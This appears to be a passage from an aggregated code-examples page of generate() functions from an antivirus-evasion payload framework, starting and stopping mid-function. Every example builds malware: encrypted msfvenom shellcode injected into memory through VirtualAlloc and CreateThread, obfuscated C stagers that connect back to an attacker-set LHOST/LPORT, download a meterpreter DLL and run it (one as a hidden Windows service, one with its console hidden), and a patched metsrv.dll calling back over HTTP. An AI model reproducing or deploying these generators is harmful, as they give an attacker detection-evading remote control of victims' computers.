    EncodedShellcode = EncodeAES(cipher, Shellcode)

    # Create Payload File
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n')
    PayloadFile.write('from Crypto.Cipher import AES\n')
    PayloadFile.write('import base64\n')
    PayloadFile.write('import os\n\n')
    PayloadFile.write(RandPadding + ' = \'{\'\n')
    PayloadFile.write(
        RandDecodeAES +
        ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' +
        RandPadding + ')\n')
    PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n')
    PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' +
                      RandCipherObject + ', \'' + EncodedShellcode + '\')\n')
    PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode +
                      '.decode("string_escape"))\n\n')
    PayloadFile.write(
        RandPtr +
        ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('
        + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode +
                      ')).from_buffer(' + RandShellCode + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' +
                      RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' +
                      RandShellCode + ')))\n\n')
    PayloadFile.write(
        RandHt +
        ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int('
        + RandPtr +
        '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n'
    )
    PayloadFile.write(
        'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt +
        '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #26
0
	def generate(self):
		if self.required_options["inject_method"][0].lower() == "virtual":
		
			# Generate Shellcode Using msfvenom
			Shellcode = self.shellcode.generate()
		
			# Generate Random Variable Names
			RandPtr = randomizer.randomString()
			RandBuf = randomizer.randomString()
			RandHt = randomizer.randomString()
			ShellcodeVariableName = randomizer.randomString()
			RandIV = randomizer.randomString()
			RandARCKey = randomizer.randomString()
			RandARCPayload = randomizer.randomString()
			RandEncShellCodePayload = randomizer.randomString()
				
			# Set IV Value and ARC Key
			iv = randomizer.randomKey(8)
			ARCKey = randomizer.randomKey(8)

			# Create DES Object and encrypt our payload
			arc4main = ARC4.new(ARCKey)
			EncShellCode = arc4main.encrypt(Shellcode)
		
			PayloadCode = 'from Crypto.Cipher import ARC4\n'
			PayloadCode += 'import ctypes\n'
			PayloadCode += RandIV + ' = \'' + iv + '\'\n'
			PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
			PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
			PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
			PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
			PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
			PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
			PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
			PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
			PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
		
			if self.required_options["use_pyherion"][0].lower() == "y":
				PayloadCode = crypters.pyherion(PayloadCode)

			return PayloadCode

		else:
			# Generate Shellcode Using msfvenom
			Shellcode = self.shellcode.generate()
		
			# Generate Random Variable Names
			RandPtr = randomizer.randomString()
			RandBuf = randomizer.randomString()
			RandHt = randomizer.randomString()
			ShellcodeVariableName = randomizer.randomString()
			RandIV = randomizer.randomString()
			RandARCKey = randomizer.randomString()
			RandARCPayload = randomizer.randomString()
			RandEncShellCodePayload = randomizer.randomString()
			RandShellcode = randomizer.randomString()
			RandReverseShell = randomizer.randomString()
			RandMemoryShell = randomizer.randomString()
				
			# Set IV Value and ARC Key
			iv = randomizer.randomKey(8)
			ARCKey = randomizer.randomKey(8)

			# Create DES Object and encrypt our payload
			arc4main = ARC4.new(ARCKey)
			EncShellCode = arc4main.encrypt(Shellcode)
		
			PayloadCode = 'from Crypto.Cipher import ARC4\n'
			PayloadCode += 'from ctypes import *\n'
			PayloadCode += RandIV + ' = \'' + iv + '\'\n'
			PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
			PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
			PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
			PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
			PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
			PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
			PayloadCode += RandShellcode + '()'

			if self.required_options["use_pyherion"][0].lower() == "y":
				PayloadCode = crypters.pyherion(PayloadCode)

			return PayloadCode
    def generate(self):
            
        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()
        
        # the real includes needed
        includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
        
        # max length string for obfuscation
        global_max_string_length = 10000
        max_string_length = random.randint(1,global_max_string_length)
        max_num_strings = 10000
        
        
        # TODO: add in more string processing functions
        randName1 = randomizer.randomString() # reverse()
        randName2 = randomizer.randomString() # doubles characters
        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
                                (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                            ]
                            
        random.shuffle(stringModFunctions)
        
        # obsufcation - "logical nop" string generation functions
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()
        stringGenFunctions = [  (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[len(randString1)/2])),
                                (randName2, "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, randomizer.randomString(50), randVar3, randomizer.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
                                (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, randomizer.randomString(50), randVar5, randVar4, randVar5))
                             ]
        random.shuffle(stringGenFunctions)
        
        # obfuscation - add in our fake includes
        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
                        "#include <limits.h>", "#include <assert.h>"]
        t = random.randint(1,7)
        for x in xrange(1, random.randint(1,7)):
            includes.append(fake_includes[x])
        
        # obsufcation - shuffle up our real and fake includes
        random.shuffle(includes)

        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"
        
            
        # real - service related headers (check the stub)
        hStatusName = randomizer.randomString()
        serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void  ServiceMain(int argc, char** argv);", "void  ControlHandler(DWORD request);"]
        random.shuffle(serviceHeaders)
        
        code += "\n".join(serviceHeaders)
        
        # obsufcation - string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"
        
        # real - build the winsock_init function
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4),helpers.obfuscateNum(2,4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
        
        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"
        
        # real - build punt function
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
        code += "closesocket(%s);" %(my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"
        
        # obsufcation - second logical nop string function
        code += stringGenFunctions[1][1] + "\n"
        
        # real - build recv_all function
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" %(buffer_name)
        code += "while (rcAmwSVM < %s) {" %(len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name)

        # obsufcation - third logical nop string function
        code += stringGenFunctions[2][1] + "\n"

        # real - build wsconnect function
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
        code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" %(sock_name)
        code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" %(my_socket_name)
        
        
        # real - main() method for the service code
        serviceName = randomizer.randomString()
        code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
        serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName), 
                                "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
                                "ServiceTable[1].lpServiceName = NULL;",
                                "ServiceTable[1].lpServiceProc = NULL;"]
        random.shuffle(serviceTableEntries)
        code += "\n".join(serviceTableEntries)
        code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
        

        # real - service status options for us to shuffle
        serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;",
                                "ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
                                "ServiceStatus.dwWaitHint = 0;",
                                "ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
                                "ServiceStatus.dwServiceSpecificExitCode = 0;",
                                "ServiceStatus.dwCheckPoint = 0;",
                                "ServiceStatus.dwServiceType = SERVICE_WIN32;"]
        random.shuffle(serviceStatusOptions)
        
        # real - serviceMain() code
        code += "void ServiceMain(int argc, char** argv) {\n"
        code += "\n".join(serviceStatusOptions)
        
        code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName)
        code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName)
        code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
        code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName)
        
        code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
        
        # obsufcation - random variable names
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()
        
        # obsufcation - necessary declarations
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1,max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1,max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1,max_num_strings)
        
        # real - necessary declarations
        code += "ULONG32 %s;" %(size_name)
        code += "char * %s;" %(buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" %(function_name)
        
        # obsufcation - malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
        
        code += "%s();" %(winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
        
        # obsufcation - malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
        
        # real - receive the 4 byte size from the handler
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2))
        # real - punt the socket if something goes wrong
        code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
        
        # real - virtual alloc space for the meterpreter .dll
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2))
        
        # obsufcation - declare space for our 3 string obfuscation array
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
        
        # obsufcation - first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
        
        # real - check if the buffer received is null, if so punt the socket
        code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
        
        # real - prepend some buffer magic to push the socket number onto the stack
        code += "%s[0] = 0xBF;" %(buffer_name)
        # real-  copy the 4 magic bytes into the buffer
        code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2))
        
        # obsufcation - malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
        
        # obsufcation - second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
        
        # real - receive all data from the socket
        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) 
        code += "%s = (void (*)())%s;" %(function_name, buffer_name)
        code += "%s();" %(function_name)
        
        # obsufcation - third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
        
        code += "} return; }\n"

        # service control handler code
        code += """void ControlHandler(DWORD request) 
    { 
        switch(request) 
        { 
            case SERVICE_CONTROL_STOP: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            case SERVICE_CONTROL_SHUTDOWN: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            default:
                break;
        } 
        SetServiceStatus (%s,  &ServiceStatus);
        return; 
    } 
    """ %(hStatusName, hStatusName, hStatusName)

        return code
Example #28
0
    def generate(self):
            
        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()
        
        # the real includes needed
        includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
        
        # max length string for obfuscation
        global_max_string_length = 10000
        max_string_length = random.randint(1,global_max_string_length)
        max_num_strings = 10000
        
        # TODO: add in more string processing functions
        randName1 = randomizer.randomString() # reverse()
        randName2 = randomizer.randomString() # doubles characters
        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
                                (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                            ]
                            
        random.shuffle(stringModFunctions)
        
        # obfuscation "logical nop" string generation functions
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()

        stringGenFunctions = [  (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[len(randString1)/2])),
                                (randName2, "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, randomizer.randomString(50), randVar3, randomizer.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
                                (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, randomizer.randomString(50), randVar5, randVar4, randVar5))
                             ]
        random.shuffle(stringGenFunctions)
        
        # obfuscation - add in our fake includes
        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
                        "#include <limits.h>", "#include <assert.h>"]
        t = random.randint(1,7)
        for x in xrange(1, random.randint(1,7)):
            includes.append(fake_includes[x])
        
        # shuffle up real/fake includes
        random.shuffle(includes)
        
        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"

        #string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"
        
        # build the winsock_init function
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
        
        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"
        
        # build punt function
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
        code += "closesocket(%s);" %(my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"
        
        # second logical nop string function
        code += stringGenFunctions[1][1] + "\n"
        
        # build recv_all function
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" %(buffer_name)
        code += "while (rcAmwSVM < %s) {" %(len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name)

        # third logical nop string function
        code += stringGenFunctions[2][1] + "\n"
        
        # build wsconnect function
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
        code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" %(sock_name)
        code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" %(my_socket_name)
        
        # build main() code
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()
        
        # obfuscation stuff
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1,max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1,max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1,max_num_strings)
        
        code += "int main(int argc, char * argv[]) {"
        code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
        code += "ULONG32 %s;" %(size_name)
        code += "char * %s;" %(buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" %(function_name)
        
        # malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
        
        code += "%s();" %(winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
        
        # malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
        
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2))
        code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
        
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2))
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
        
        # first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
        
        # real code
        code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
        code += "%s[0] = 0xBF;" %(buffer_name)
        code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2))
        
        # malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
        
        # second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
        
        # real code
        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) 
        code += "%s = (void (*)())%s;" %(function_name, buffer_name)
        code += "%s();" %(function_name)
        
        # third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
        
        code += "return 0;}\n"

        return code
Example #29
0
    def generate(self):
        
        metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
        
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header

        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
        headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # doing void * cast
        payloadCode += "from ctypes import *\nimport base64,zlib\n"

        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()

        # deflate function
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

        randVarName = randomizer.randomString()
        randFuncName = randomizer.randomString()
        
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
        
        if self.required_options["use_encrypter"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
Example #30
0
	def generate(self):
		#Random letter substition variables
		hex_letters = "abcdef"
		non_hex_letters = "ghijklmnopqrstuvwyz"
		encode_with_this = random.choice(hex_letters)
		decode_with_this = random.choice(non_hex_letters)

		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		subbed_shellcode_variable_name = randomizer.randomString()
		shellcode_variable_name = randomizer.randomString()
		rand_ptr = randomizer.randomString()
		rand_buf = randomizer.randomString()
		rand_ht = randomizer.randomString()
		rand_decoded_letter = randomizer.randomString()
		rand_correct_letter = randomizer.randomString()
		rand_sub_scheme = randomizer.randomString()

		# Create Letter Substitution Scheme
		sub_scheme = string.maketrans(encode_with_this, decode_with_this)

		# Escaping Shellcode
		Shellcode = Shellcode.encode("string_escape")

		if self.required_options["inject_method"][0].lower() == "virtual":

			# Create Payload File
			payload_code = 'import ctypes\n'
			payload_code += 'from string import maketrans\n'
